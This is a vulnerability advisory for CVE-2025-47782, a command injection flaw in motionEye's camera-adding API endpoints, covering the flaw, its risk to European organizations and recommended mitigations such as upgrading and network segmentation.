CVE-2025-47782 is a high-severity OS command injection vulnerability affecting the motionEye project, an online interface for the motion video surveillance software. The vulnerability exists in versions 0.43.1b1 through 0.43.1b3. It arises from improper neutralization of special elements used in OS commands (CWE-78) when processing a crafted camera device path via the motionEye web API endpoints `add` or `add_camera`. An attacker who has administrative credentials to motionEye can exploit this flaw by submitting a specially constructed device path that allows execution of arbitrary commands within a non-interactive shell context. These commands run with the privileges of the motionEye process user, typically the `motion` user. This can lead to unauthorized command execution on the host system, potentially compromising system integrity and confidentiality. The vulnerability does not require user interaction beyond possessing admin credentials, and the attack vector is network-based (remote). The issue has been addressed in motionEye version 0.43.1b4, and users are advised to upgrade or manually apply the patch. No known exploits are currently reported in the wild, but the high CVSS 4.0 score of 8.9 reflects the critical nature of the vulnerability due to its ease of exploitation and impact.

For European organizations deploying motionEye for video surveillance, this vulnerability poses a significant risk. Successful exploitation could allow attackers to execute arbitrary commands on surveillance servers, potentially leading to full system compromise, data exfiltration, or disruption of surveillance operations. This could impact confidentiality by exposing sensitive video feeds or system data, integrity by allowing tampering with surveillance configurations or logs, and availability by disabling or degrading surveillance services. Organizations in critical infrastructure sectors such as transportation, public safety, and utilities that rely on motionEye for monitoring could face operational disruptions or espionage risks. The requirement for admin credentials somewhat limits the attack surface but insider threats or compromised credentials could enable exploitation. Given the widespread use of motionEye in small to medium enterprises and public sector entities across Europe, the threat is material and warrants immediate remediation.

European organizations should prioritize upgrading motionEye installations to version 0.43.1b4 or later to fully remediate the vulnerability. Where immediate upgrade is not feasible, applying the official patch manually is essential. Additionally, organizations should enforce strong administrative credential policies, including multi-factor authentication and regular password rotation, to reduce the risk of credential compromise. Network segmentation should be employed to restrict access to the motionEye web API to trusted management networks only. Monitoring and logging of administrative API calls can help detect suspicious activity indicative of exploitation attempts. Furthermore, implementing host-based intrusion detection systems (HIDS) on surveillance servers can alert on anomalous command executions. Regular vulnerability scanning and penetration testing focused on motionEye deployments will help identify residual risks. Finally, organizations should review and harden the underlying operating system and user permissions for the `motion` user to limit the impact of any potential command execution.